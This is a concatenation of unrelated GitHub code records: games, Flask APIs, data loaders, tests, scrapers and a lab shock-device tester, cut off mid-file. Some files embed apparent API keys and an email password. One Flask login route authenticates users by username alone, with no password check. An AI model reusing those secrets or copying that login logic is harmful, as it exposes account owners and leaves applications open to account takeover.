self.inputIndices[:-1]\n # self.inputWord = self.inputWord[:-1]\n # self.updateEnterboxSurface()\n if self.inputWord != \"\": self.inputWord = self.inputWord[:-1]\n self.updateEnterboxSurface()\n\n def submitWord(self):\n # if len(self.inputIndices) >= 3:\n # self.client.sendWord(self.inputWord.lower())\n # self.inputIndices = []\n # self.inputWord = \"\"\n # self.updateEnterboxSurface()\n if len(self.inputWord) >= 3:\n self.client.sendWord(self.inputWord.lower())\n self.inputWord = \"\"\n self.updateEnterboxSurface()\n\n def updateSquareSurfaces(self):\n self.squareSurfaces = []\n for i in range(9):\n surface = pygame.Surface(squareTLRect[2:4], SRCALPHA).convert_alpha()\n\n if self.client.state.phase == \"idle\" or self.client.state.phase == \"countdown\":\n surface.fill(squareOffColor)\n pygame.draw.rect(surface, squareShadowOffColor, (0, 0, squareTLRect[2], squareShadowHeight))\n elif self.client.state.phase == \"play\" or self.client.state.phase == \"results\":\n letter = self.client.state.letters[int(i/3)][i%3]\n if i in self.inputIndices:\n bgColor = squareOnColor\n shadowColor = squareShadowOnColor\n textTopColor = squareTextOnColor\n textBotColor = squareTextShadowOnColor\n else:\n bgColor = squareOffColor\n shadowColor = squareShadowOffColor\n textTopColor = squareTextOffColor\n textBotColor = squareTextShadowOffColor\n surface.fill(bgColor)\n pygame.draw.rect(surface, shadowColor, (0, 0, squareTLRect[2], squareShadowHeight))\n blitSurfaceCenter(surface, squareFont.render(letter, True, textBotColor), (0, squareTextHeight / 2))\n blitSurfaceCenter(surface, squareFont.render(letter, True, textTopColor), (0, squareTextHeight / -2))\n \n self.squareSurfaces.append(surface)\n\n def updateMessageSurface(self, messageType, ready = False, word = \"n/a\"):\n if messageType == \"start\":\n color = messageTextStartColor\n if ready:\n text = \"Waiting for other players...\"\n else:\n text = \"Press Space to start\"\n elif messageType == \"unique\":\n color = messageTextUniqueColor\n text = word.upper() + \": +\" + str(gamestate.wordScores[len(word)])\n elif messageType == \"taken\":\n color = messageTextTakenColor\n text = word.upper() + \" has been played!\"\n elif messageType == \"invalid\":\n color = messageTextInvalidColor\n text = word.upper() + \" is an invalid word!\"\n\n self.messageSurface.fill((0,0,0,0))\n blitSurfaceCenter(self.messageSurface, messageFont.render(text, True, color))\n\n def updateEnterboxSurface(self):\n self.enterboxSurface.fill((0,0,0,0))\n blitSurfaceCenter(self.enterboxSurface, enterboxFont.render(self.inputWord, True, enterboxTextColor))\n\n def updateHourglassSurface(self):\n self.hourglassSurface.fill((0,0,0,0))\n y = (hourglassRect[3] - 2 * (hourglassBorder1 + hourglassBorder2)) * (1 - self.client.state.timer / gamestate.playTime)\n self.hourglassSurface.blit(hourglassImage, (0, round(y)))\n\n def updateScorecardSurfaces(self):\n self.scorecardSurfaces = []\n data = [(player.username, player.score) for player in self.client.state.players.values()]\n data.sort(key = lambda x : x[1], reverse = True)\n\n for i in range(len(data)):\n surface = pygame.Surface(scorecardTRect[2:4], SRCALPHA).convert_alpha()\n\n if (i == 0): surface.fill(scorecardBorderTopColor)\n else: surface.fill(scorecardBorderNormalColor)\n drawShrunkenRect(surface, scorecardColor, (0, 0) + scorecardTRect[2:4], scorecardBorder)\n\n if (data[i][0] == self.client.username): blitSurfaceCenterX(surface, scorecardNameFont.render(data[i][0], True, scorecardTextNameSelfColor), scorecardTextMarginLeft)\n else: blitSurfaceCenterX(surface, scorecardNameFont.render(data[i][0], True, scorecardTextNameNormalColor), scorecardTextMarginLeft + scorecardBorder)\n scoreText = scorecardScoreFont.render(str(data[i][1]), True, scorecardTextScoreColor)\n blitSurfaceCenterX(surface, scoreText, scorecardTRect[2] - scoreText.get_width() - scorecardTextMarginRight - scorecardBorder)\n\n self.scorecardSurfaces.append(surface)\n\napp = App()","repo_name":"Aledax/BoggleBlitz","sub_path":"scripts/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5650453798","text":"\nimport collaborative_journal as cj\n\nfrom flask import request, session, redirect, url_for, render_template, jsonify\nfrom flask_login import current_user, login_user, logout_user\nimport json\nfrom flask_wtf import csrf\n\nfrom collaborative_journal.model.login import RegisterForm, LoginForm\nfrom collaborative_journal.model.user import User\nfrom collaborative_journal.model import db\nfrom collaborative_journal import load_user\n# from django.views.decorators.csrf import ensure_csrf_cookie\n\n\n\n# @ensure_csrf_cookie\n# @cj.app.route('/login/request', methods=['POST'])\n# def login_request():\n# print(\"\\nPOST LOGIN REQUEST\\n\")\n# data = json.loads(request.data)\n\n# print(data)\n# user = User.query.filter_by(username=data['username']).first()\n# login_user(user, remember=True)\n# return jsonify(**{'is_authenticated': True})\n\n\n\n\n\n# @cj.app.route('/token', methods=['GET'])\n# def token():\n\n# token = csrf.generate_csrf()\n# return jsonify(**{'token': token})\n\n\n\n@cj.app.route('/login', methods=['POST', 'GET'])\ndef login():\n print(request.data)\n if request.method == 'GET':\n print(\"\\nGET REQUEST\\n\")\n # context = {'token': csrf.generate_csrf()}\n context={}\n if current_user.is_authenticated:\n context['is_authenticated']= True\n else:\n context['is_authenticated']= False\n return render_template('index_dynamic.html', **context)\n \n if request.method == 'POST':\n data = json.loads(request.data)\n print(request)\n print(data)\n user = User.query.filter_by(username=data['username']).first()\n login_user(user, remember=True)\n print(\"logging in user: \", user.username)\n print(\"with id: \", user.id)\n return jsonify(**{'is_authenticated': True})\n\n\n # user = User.query.filter_by(username=form.username.data).first()\n # if user is None or not user.check_password(form.password.data):\n # print(form.data)\n # return jsonify(**{'is_authenticated': False}) \n # login_user(user, remember=True)\n # return jsonify(**{'is_authenticated': True})\n \n\n\n@cj.app.route('/logout', methods=['GET', 'POST'])\ndef logout():\n logout_user()\n # return redirect(url_for('login'))\n token = csrf.generate_csrf()\n return jsonify(**{'is_authenticated': False, 'token': token})\n\n\n\n\n@cj.app.route('/register', methods=['POST'])\ndef register():\n if request.method == 'GET':\n return jsonify(**{})\n\n\n elif request.method == 'POST':\n data = json.loads(request.data)\n user = User(username=data['username'])\n print(user)\n user.set_password(data['password'])\n db.session.add(user)\n db.session.commit()\n login_user(user, remember=True)\n\n return jsonify(**{'successful_register': True})\n\n\n # if current_user.is_authenticated:\n # return redirect(url_for('index'))\n # form = RegisterForm()\n # if form.validate_on_submit():\n # user = User(username=form.username.data)\n # user.set_password(form.password.data)\n # db.session.add(user)\n # db.session.commit()\n # # flash('Congratulations, you are now a registered user!')\n # return redirect(url_for('login'))\n # return render_template('register.html', title='Register', form=form)\n\n\n\n\n\n\n","repo_name":"scshafe/cj","sub_path":"collaborative_journal/api/authentication/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19395463496","text":"import progressbar\nimport six\nimport datetime\n\nimport numpy as np\nimport chainer.functions as F\nfrom chainer.backends import cuda\nimport re\n\nclass LoadData:\n\n UNK = 0\n EOS = 1\n PAD = -1\n #seqenceの長さのMaxとMin\n minlen = 1\n maxlen = 50\n vocabulary = {}\n peVocabulary = {}\n ids_words = {}\n\n @classmethod\n def word_ids(cls, voPath):\n #wordをidにするword_ids\n #辞書{文字:数字} 文字を入れたら数字が得られる\n with open(voPath) as f:\n # +2 for UNK and EOS\n #line.strip 改行空白除去\n vocabulary = {line.strip(): i + 2 for i, line in enumerate(f)}\n vocabulary['<UNK>'] = 0\n vocabulary['<EOS>'] = 1\n vocabulary['<PAD>'] = -1 #いる?\n return vocabulary\n\n\n @classmethod\n def ids_word(cls, vocabulary):\n #idをwordにする\n #辞書{数字:文字} 数字を入れたら文字が得られる\n ids_words = {i: w for w, i in vocabulary.items()}\n return ids_words\n\n\n @classmethod\n def load_data(cls, path):\n n_lines = cls.count_lines(path)\n bar = progressbar.ProgressBar()\n wordData = []\n #humanData = []\n count = 0\n print('loading...: %s' % path)\n with open(path) as f:\n for line in bar(f, max_value=n_lines):\n parson = re.match(r'[^(:|\\n)]*:', line)#:を抜いた人の名前2単語以上ならどうしよ?\n line = re.sub(r'[^(:|\\n)]*:', \"\", line)\n if parson != None:\n parson = parson.group(0)[:-1].strip()\n else:\n count += 1\n parson = \"none\"\n words = line.strip().split()\n #numpyにせんとメモリが\n wordArray = np.array([cls.vocabulary.get(w, cls.UNK) for w in words], dtype=np.int32)\n parson = np.array(cls.peVocabulary.get(parson, cls.UNK), dtype=np.int32)\n wordData.append((parson, wordArray))\n print(count)\n return wordData\n\n @classmethod\n def count_lines(cls, path):\n #lineを数える\n with open(path) as f:\n return sum([1 for _ in f])\n\n @classmethod\n def sequence_embed(cls, embed, xs):\n #各文の長さ len(xs)はバッチサイズ\n if len(np.shape(xs)) != 1:\n x_len = [len(x) for x in xs]\n #cumsum指定された軸方向に足し合わされていった値を要素とする配列が返されます。\n #x_len[:-1]は一番最後を抜いたリスト\n x_section =np.cumsum(x_len[:-1])\n #xsはVariableかnumpy.ndarrayかcupy.ndarrayのタプル\n #concatは配列の結合axis=0は縦に結合行数が多くなる\n ex = embed(F.concat(xs, axis=0))\n #spritされてタプルが帰る結合したのを元に戻してそう\n exs = F.split_axis(ex, x_section, 0)\n else:\n exs = embed(xs)\n return exs\n\n @classmethod\n def makeVocab(cls, voPath, peVoPath):\n cls.vocabulary = cls.word_ids(voPath)\n cls.peVocabulary = cls.word_ids(peVoPath)\n cls.ids_words = cls.ids_word(cls.vocabulary)\n\n @classmethod\n def makeData(cls, inPath, outPath, voPath, peVoPath):\n #return [(source wordID0, target wordID0),(),()], {word:ID,..}, $0の分割版いる?\n #[np.array0, np.array1,...] ID\n #inData[(parson, wordArray), (), ()]\n inData = cls.load_data(inPath)\n outData = cls.load_data(outPath)\n assert len(inData) == len(outData)#ちょい厳しい\n train_data = [#write\n ((s[0], np.append(s[1], cls.EOS)), (t[0], np.append(t[1], cls.EOS)))\n for s, t in six.moves.zip(inData, outData)\n if (cls.minlen <= len(s[1])+1 <= cls.maxlen\n and\n cls.minlen <= len(t[1])+1 <= cls.maxlen)\n ]\n #おまけ\n print('[{}] Dataset loaded.'.format(datetime.datetime.now()))\n train_source_unknown = cls.calculate_unknown_ratio(\n [s[1] for s, _ in train_data])\n train_target_unknown = cls.calculate_unknown_ratio(\n [t[1] for _, t in train_data])\n\n print('vocabulary size: %d' % len(cls.vocabulary))\n print('persona vocabulary size %d' % len(cls.peVocabulary))\n print('Train data size: %d' % len(train_data))\n print('source unknown ratio: %.2f%%' % (\n train_source_unknown * 100))\n print('target unknown ratio: %.2f%%' % (\n train_target_unknown * 100))\n\n #train_data[((inparson, inArray),(outparson, outArray)), ((inparson, inArray),(outparson, outArray))]\n return (train_data, inData, outData)\n\n @classmethod\n def calculate_unknown_ratio(cls, data):\n unknown = sum((s == cls.UNK).sum() for s in data)\n total = sum(s.size for s in data)\n return unknown / total\n\n\n","repo_name":"IshikuraGaku/persona2","sub_path":"loadData.py","file_name":"loadData.py","file_ext":"py","file_size_in_byte":4993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40161200860","text":"\"\"\"\nobsahuje.py\n\nnačte řetězec obsahující znaky a číslice\nprochází řetězec a rozděluje znaky do skupin: písmena, číslice, jiné znaky\nvypíše kolik znaků obsahuje každá skupina\n\nnačte nový znak. pokud se v řetězci nevyskytuje, přidá jej na konec řetězce\na celý řetězec vypíše na obrazovku\n\n\"\"\"\npocet_pismen = 0\npocet_cisel = 0\npocet_jine = 0\n\nretezec = str(input(\"zadej libovolný řetězec: \"))\n\ndelka = len(retezec)\n\nprint()\nprint(f\"Počet písmen v řetězci: {delka}\")\n\nfor i in range(0, delka):\n if retezec[i].isalpha():\n pocet_pismen = pocet_pismen + 1\n else:\n if retezec[i].isdigit():\n pocet_cisel = pocet_cisel + 1\n else:\n pocet_jine = pocet_jine + 1\n\nprint(\"V řetězci je:\")\nprint(f\"Písmen: {pocet_pismen:>}\")\nprint(f\"Čísel: {pocet_cisel:>}\")\nprint(f\"Dalších znaků: {pocet_jine:>}\")\n\ndalsi_znak = str(input(\"Zadej další znak: \"))\n\n#if retezec.find(dalsi_znak)== -1: #jeden způsob\nif dalsi_znak not in retezec: # druhý možný způsob\n pass\n retezec = retezec + dalsi_znak\n print(f\"Zadaný znak byl přidán na konec řetězce. Nový řetězec je \\\"{retezec}\\\".\")\nelse:\n print(f\"Zadaný znak již v řetězci \\\"{retezec}\\\" existuje.\")\n","repo_name":"krikavap/python-kurz","sub_path":"obsahuje.py","file_name":"obsahuje.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44598377377","text":"import pandas as pd\nfrom collections import Counter\nimport re\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndata = pd.read_csv('reinvers_explain.csv')\ncol = list(data.columns.values)\nfeatures = {}\nfe = {}\nfor s in col:\n c = re.sub(r\"[<>=0-9.\\s+]\", \"\", s)\n if c in features:\n features[c] = data[s].dropna().shape[0]+features[c]\n else:\n features[c] = data[s].dropna().shape[0]\n fe[s] = data[s].dropna().shape[0]\nf_df = pd.DataFrame.from_dict(features.items())\nf_df.to_csv('a.csv', index=False)\n# sort by value count\nfe = {k: v for k, v in sorted(fe.items(), key=lambda item: item[1], reverse=True)}\ndata = data[list(fe.keys())]\nplt.figure(figsize=(10, 12))\nax = sns.heatmap(data.T, yticklabels=True)\nplt.show()\n\nprint('done')","repo_name":"chingheng113/twStrokeML","sub_path":"right_wrong_model_building/explain_features.py","file_name":"explain_features.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42229757146","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 17 13:25:04 2021\n\n@author: afe02\n\"\"\"\nimport unittest\nimport shapes_begin as shapes\nimport math\n\n\n\nclass TestCircle(unittest.TestCase):\n def setUp(self):\n self._circle1 = shapes.Circle(\"c1\", \"red\", 1)\n self._circle2 = shapes.Circle(\"c2\", \"blue\", 2)\n def testNameColor(self):\n self.assertEqual(self._circle1.name(), \"c1\")\n self.assertEqual(self._circle2.name(), \"c2\")\n self.assertEqual(self._circle1.color(), \"red\")\n self.assertEqual(self._circle2.color(), \"blue\")\n def testArea(self):\n area1 = math.pi\n area2 = 4 * math.pi\n self.assertAlmostEqual(self._circle1.area(), area1)\n self.assertAlmostEqual(self._circle2.area(), area2)\n def testCircumference(self):\n circ1 = 2* math.pi\n circ2 = 4 * math.pi\n self.assertAlmostEqual(self._circle1.circumference(), circ1)\n self.assertAlmostEqual(self._circle2.circumference(), circ2)\n \n \nclass TestTriangle(unittest.TestCase):\n def setUp(self):\n self._triangleAcuteAngle1 = shapes.Triangle(\"taa1\", \"red\", 2, 2, 60)\n self._triangleAcuteAngle2 = shapes.Triangle(\"taa2\", \"black\", math.sqrt(3), 2, 30)\n self._triangleAcuteAngle3 = shapes.Triangle(\"taa3\", \"red\", 1, math.sqrt(2), 45)\n self._triangleObtuseAngle1 = shapes.Triangle(\"toa1\", \"red\", 1, 2, 120) \n def testNameColor(self):\n self.assertEqual(self._triangleAcuteAngle1.name(), \"taa1\")\n self.assertEqual(self._triangleAcuteAngle2.name(), \"taa2\")\n self.assertEqual(self._triangleAcuteAngle1.color(), \"red\")\n self.assertEqual(self._triangleAcuteAngle2.color(), \"black\")\n def testArea(self):\n areaAA1 = math.sqrt(3)\n areaAA2 = areaAA1/2\n areaAA3 = 0.5\n areaOA1 = areaAA2\n self.assertAlmostEqual(self._triangleAcuteAngle1.area(), areaAA1)\n self.assertAlmostEqual(self._triangleAcuteAngle2.area(), areaAA2)\n self.assertAlmostEqual(self._triangleAcuteAngle3.area(), areaAA3)\n self.assertAlmostEqual(self._triangleObtuseAngle1.area(), areaOA1)\n def testCircumference(self):\n circAA1 = 6\n circAA2 = 3 + math.sqrt(3)\n circAA3 = 2 + math.sqrt(2)\n circOA1 = 3 + math.sqrt(7)\n self.assertAlmostEqual(self._triangleAcuteAngle1.circumference(), circAA1)\n self.assertAlmostEqual(self._triangleAcuteAngle2.circumference(), circAA2)\n self.assertAlmostEqual(self._triangleAcuteAngle3.circumference(), circAA3)\n self.assertAlmostEqual(self._triangleObtuseAngle1.circumference(), circOA1)\n \nclass TestRectangle(unittest.TestCase):\n def setUp(self):\n self._rect1 = shapes.Rectangle(\"r1\", \"red\", 2, 4)\n self._rect2 = shapes.Rectangle(\"r2\", \"white\", 3.5, 2)\n def testNameColor(self):\n self.assertEqual(self._rect1.name(), \"r1\")\n self.assertEqual(self._rect2.name(), \"r2\")\n self.assertEqual(self._rect1.color(), \"red\")\n self.assertEqual(self._rect2.color(), \"white\")\n def testArea(self):\n area1 = 8\n area2 = 7\n self.assertAlmostEqual(self._rect1.area(), area1)\n self.assertAlmostEqual(self._rect2.area(), area2)\n def testCircumference(self):\n circ1 = 12\n circ2 = 11\n self.assertAlmostEqual(self._rect1.circumference(), circ1)\n self.assertAlmostEqual(self._rect2.circumference(), circ2)\n \n \nif __name__ == '__main__':\n unittest.main()\n ","repo_name":"FarsanBaloo/DVA245","sub_path":"Assignments/1-OOP-IterGen/shapes_test.py","file_name":"shapes_test.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1060407357","text":"num_capicua = int(input(\"Ingrese número: \"))\n\ndef get_lista_numero(numero):\n lista = []\n i = 4\n while i == 4:\n ultimo = numero % 10\n lista.append(ultimo)\n numero //= 10\n if numero == 0:\n i = 7\n lista.reverse()\n return lista\n\nprint(get_lista_numero(num_capicua))\n\ndef get_lista_numero_invertido(numero):\n num_invertido = []\n i = 4\n while i == 4:\n ultimo = numero % 10\n num_invertido.append(ultimo)\n numero //= 10\n if numero == 0:\n i = 7\n return num_invertido\n\nprint(get_lista_numero_invertido(num_capicua))\n\ndef capicua(list_1, list_2):\n long = len(list_1)\n i = 0\n while i < long:\n if list_1[i] == list_2[i]:\n i += 1\n if i == long:\n return True\n else:\n return False\n\nif capicua(get_lista_numero(num_capicua), get_lista_numero_invertido(num_capicua)):\n print(\"Es capicua\")\nelse:\n print(\"No es capicua\")\n\n","repo_name":"MenMor/FuncionesEj","sub_path":"capicua_listas.py","file_name":"capicua_listas.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42662669695","text":"\n\ndef getParking():\n import requests\n import json\n\n url = 'http://openapi.seoul.go.kr:8088/66646952616b696d3333576154424a/json/GetParkInfo/1/900/'\n\n r = requests.get(url).text\n list = json.loads(r)\n total = int(list['GetParkInfo']['list_total_count'])\n Plist = []\n for start in range(1, total, 1000):\n end = start + 1000 - 1\n if end > total:\n end = total\n subUrl = 'http://openapi.seoul.go.kr:8088/66646952616b696d3333576154424a/json/GetParkInfo/' + str(\n start) + '/' + str(end) + '/'\n\n data = json.loads(requests.get(subUrl).text)\n row = data['GetParkInfo']['row']\n\n for item in row:\n if 'PARKING_NAME' in item:\n name = item['PARKING_NAME']\n addr = item['ADDR']\n LAT = item['LAT']\n LNG = item['LNG']\n Plist.append({'name': name, 'addr': addr, 'LAT': LAT, 'LNG': LNG})\n\n return Plist\n\n\ndef getPharmacy():\n from urllib.parse import quote\n import requests\n import bs4\n\n endpoint = 'http://apis.data.go.kr/B552657/ErmctInsttInfoInqireService/getParmacyListInfoInqire?'\n serviceKey = 'B78CbLfOD6924JbTWwuUqjtPrOE%2F8gN00tgnG17lUMgvQUx%2BqqdulYUiCVflKIexihA7Q22UlwVwHmPLVAGt5g%3D%3D'\n\n # 일요일에 문여는 약국의 이름과 주소\n\n Q0 = quote('서울특별시')\n # Q1 = quote('강남구')\n # QT = '1'\n # QN = quote('삼성약국')\n QRD = 'NAME'\n pageNo = '1'\n startPage = '1'\n numOfRows = '5000'\n # pageSize = '10'\n\n paramset = \"serviceKey=\" + serviceKey + \"&Q0=\" + Q0 + \"&QRD=\" + QRD + \"&pageNo=\" + pageNo + \"&startPage=\" + startPage + \"&numOfRows=\" + numOfRows\n\n url = endpoint + paramset\n print(url)\n result = requests.get(url)\n bs_obj = bs4.BeautifulSoup(result.content, 'html.parser')\n items = bs_obj.findAll('item')\n\n listN = []\n\n for item in items:\n tagged_item = item.find(\"dutytime6s\")\n tagged_item2 = item.find(\"dutytime7s\")\n tagged_item3 = item.find(\"dutytime8s\")\n if (tagged_item != None and tagged_item2 != None and tagged_item3 != None):\n name = item.find(\"dutyname\").text\n addr = item.find(\"dutyaddr\").text\n lat = item.find('wgs84lat').text\n lon = item.find('wgs84lon').text\n # print(name, lat, lon)\n listN.append({'name': name, 'addr': addr, 'lat': lat, 'lon': lon})\n return listN\n\n\n\ndef getEos():\n import requests\n from bs4 import BeautifulSoup\n rlist = []\n url = 'https://bp.eosgo.io/'\n result = requests.get(url)\n\n bs_obj = BeautifulSoup(result.content, 'html.parser')\n itemList = bs_obj.findAll('div', {\"class\": \"lf-item\"})\n\n # 해야할일 포문 돌리는건 똑같음\n hrefs = [item.find(\"a\")['href'] for item in itemList] # 위의 4줄이 1줄로 줄어듬\n\n for h in hrefs:\n r = requests.get(h)\n obj = BeautifulSoup(r.content, 'html.parser')\n profile_name = obj.find(\"div\", {'class': 'profile-name'})\n title = profile_name.find(\"h1\").text\n\n cb = obj.find(\"div\", {\"class\": \"cover-buttons\"})\n location = cb.find('span', {'class': 'button-label'}).text\n website = cb.find('a')['href']\n\n rlist.append({\"title\": title, \"location\": location, \"website\": website})\n return rlist\n\n\ndef getNowNews():\n import urllib.request\n import bs4\n\n rList = []\n\n url = 'https://news.naver.com/'\n html = urllib.request.urlopen(url)\n obj = bs4.BeautifulSoup(html, \"html.parser\")\n newsList = obj.findAll(\"div\", {\"class\": \"newsnow_tx_inner\"})\n for news in newsList:\n a = news.find(\"a\")\n url = a[\"href\"]\n title = news.find('strong').text\n rList.append({\"title\":title,\"url\":url})\n return rList\n\n\n\n","repo_name":"kimkm0828/pythonTest","sub_path":"parking/myutil.py","file_name":"myutil.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73810241444","text":"import tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nimport numpy as np\n\n#1. 데이터 [input layer]\nx = np.array([1,2,3])\ny = np.array([1,2,3])\n\n#2. 모델구성 [hidden layer]\nmodel = Sequential()\nmodel.add(Dense(55, input_dim=1)) # 노드 1개 > 55개\nmodel.add(Dense(77, activation='relu')) #하이퍼 파라미트 튜닝\nmodel.add(Dense(100, activation='sigmoid'))\nmodel.add(Dense(70, activation='linear'))\nmodel.add(Dense(44))\nmodel.add(Dense(1))\n\nmodel.summary() # 연산개수확인 , 바이어스로 인해 각 레이어마다 노드 1개가 더 있는것처럼 연산 갯수가 늘어난다.\n\n'''\n#3. 컴파일, 훈련\nmodel.compile(loss='mse', optimizer='adam') #mne\nmodel.fit(x, y, epochs=30, batch_size=1)\n\n#4. 평가, 예측 [output layer]\nloss = model.evaluate(x, y)\nprint('loss : ', loss)\nresult = model.predict([4])\nprint('4의 예측값 : ', result)\n\n\nloss : 0.0002002768887905404\n4의 예측값 : [[3.98252]]\n'''","repo_name":"jangsejong/STUDY","sub_path":"keras/keras21_22_summary/keras21_summary .py","file_name":"keras21_summary .py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30690703651","text":"# Scrapy settings for wikiscraper project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n#\n\nBOT_NAME = 'wikiscraper'\n\nSPIDER_MODULES = ['wikiscraper.spiders']\nNEWSPIDER_MODULE = 'wikiscraper.spiders'\nLOG_LEVEL = 'DEBUG'\n\nITEM_PIPELINES = {\n 'wikiscraper.pipelines.ESPipeline': 100,\n}\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'wikiscraper (+http://www.yourdomain.com)'\n","repo_name":"marcocot/wikiscrapy","sub_path":"wikiscraper/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28618297967","text":"from database import Base\nfrom sqlalchemy import String,Boolean,Integer,Column, Text, Date, ForeignKey\nfrom sqlalchemy.orm import relationship\n\n\nclass Restaurant(Base):\n __tablename__ = 'restaurant'\n id = Column(Integer,primary_key=True, index=True)\n name = Column(String(255), nullable=False,unique=True)\n place = Column(Text)\n\n\nclass Menus(Base):\n __tablename__ = 'menus'\n id = Column(Integer,primary_key=True, index=True)\n menu_item = Column(Text)\n price = Column(Integer)\n date = Column(Date)\n resto_id = Column(Integer, ForeignKey(\"restaurant.id\", ondelete=\"CASCADE\"))\n\nclass Users(Base):\n __tablename__ = 'users'\n id = Column(Integer,primary_key=True, index=True)\n name = Column(String(255), nullable=False,unique=True)\n email = Column(String)\n password = Column(String)\n position = Column(String)\n\n \nclass Voting(Base):\n __tablename__ = 'vote'\n id = Column(Integer,primary_key=True, index=True)\n vote= Column(Boolean)\n date = Column(Date)\n menu_id = Column(Integer, ForeignKey(\"menus.id\", ondelete=\"CASCADE\"))\n user_id = Column(Integer, ForeignKey(\"users.id\", ondelete=\"CASCADE\"))\n \nclass VotingNew(Base):\n __tablename__ = 'voting'\n id = Column(Integer,primary_key=True, index=True)\n vote= Column(Integer)\n date = Column(Date)\n menu_id = Column(Integer, ForeignKey(\"menus.id\", ondelete=\"CASCADE\"))\n user_id = Column(Integer, ForeignKey(\"users.id\", ondelete=\"CASCADE\"))","repo_name":"lops21/RestaurantChallenge","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35849157850","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 25 13:27:33 2019\n\n@author: Josh\n\"\"\"\n\nimport sys\nimport time\n\ntry:\n from itertools import izip\nexcept ImportError:\n izip=zip\n\ntry:\n import tkinter as tk\n from tkinter import messagebox\nexcept ImportError:\n import Tkinter as tk\n from Tkinter import messagebox\n \nfrom shocker import Shocker\n\nclass MainForm(tk.Tk):\n '''\n Tkinter root class just used to ask for details at the start\n '''\n \n # range for program levels\n lo=71\n hi=104\n # range for dial values\n dlo=0.9\n dhi=4.4\n \n # dial<->program is roughly linear from someone else's tests\n # dials=np.array([0.9,1.1,1.4,1.7,2.1,2.5,2.8,3.3,4.4])\n # levels=np.array([71,72,75,79,80,84,91,96,104])\n \n def __init__(self):\n tk.Tk.__init__(self)\n self.title('Shock Value Tester')\n self.grid()\n self.group = group=tk.LabelFrame(self)\n group.grid(row=9,columnspan=7,sticky='W',padx=5,pady=5,ipadx=5,ipady=5)\n \n label=tk.Label(group,text=\"duration (s)\")\n label.grid(row=0,column=0,sticky='W')\n \n self.db = tk.Entry(group)\n self.db.insert(0,1.0)\n self.db.grid(row=0,column=1,sticky='W')\n \n label=tk.Label(group,text=\"shock level\")\n label.grid(row=1,column=0,sticky='W')\n \n self.sb = tk.Spinbox(group,from_=self.lo,to=self.hi)#,validate='focusout',validatecommand=self._validate)\n self.sb.grid(row=1,column=1,sticky='W')\n \n #spacer\n label=tk.Label(group,text=\"\")\n label.grid(pady=10)\n \n self.zb = tk.Button(group,text=\"ZAP\",command=self.shock)\n self.zb.grid(sticky='E',column=0,pady=0)\n \n self.bind('<Return>',self.shock)\n self.bind('<Escape>',self.close)\n self.protocol('WM_DELETE_WINDOW',self.close)\n \n try:\n shocker = Shocker(192,address=0xD070,mode='in_lab')\n except Exception as e:\n print(e)\n print('not enabling shocker')\n shocker = Shocker(0,0,0)\n self.shocker=shocker\n \n self._shockStop()\n \n def close(self,event=None):\n self.destroy()\n \n def _shockStop(self):\n self.shocker.stop()\n self.configure(background='grey')\n \n def shock(self,event=None):\n try:\n level=int(self.sb.get())\n except ValueError:\n print('invalid level (must be integer)')\n return\n if not self.lo<=level<=self.hi:\n print('invalid range for shock [{},{}]'.format(self.lo,self.hi))\n return\n self.shocker.level=level\n \n try:\n dur=float(self.db.get())\n except ValueError:\n print('invalid duration')\n return\n \n dial = (self.dhi-self.dlo)/(self.hi-self.lo) * (level-self.lo) + self.dlo\n print('shocking level {} for {} s (dial value would be about {:0.3f})'.format(level,dur,dial))\n \n self.configure(background='red')\n self.shocker.start()\n self.after(int(dur*1000), self._shockStop)\n\n\nroot=MainForm()\nroot.mainloop()","repo_name":"navotnaor/navotnaor.github.io","sub_path":"lab_shock_test.py","file_name":"lab_shock_test.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71255042086","text":"from flask import Flask,url_for,render_template,request,redirect\n\nfrom flask_sqlalchemy import SQLAlchemy\n\n#from flask_mail import Mail\n\nimport smtplib\n\napp=Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:@localhost/shop'\ndb=SQLAlchemy(app)\n\n#mail = Mail(app)\n\n'''app.config.update(MAIL_SERVER = 'smtp.gmail.com',\nMAIL_PORT='587',\nMAIL_USE_SSL = True,\nMAIL_USERNAME= 'madanlal885522@gmail.com',\nMAIL_PASSWORD ='hYfkC4NvaG58r8bfPX71')'''\n\ns = 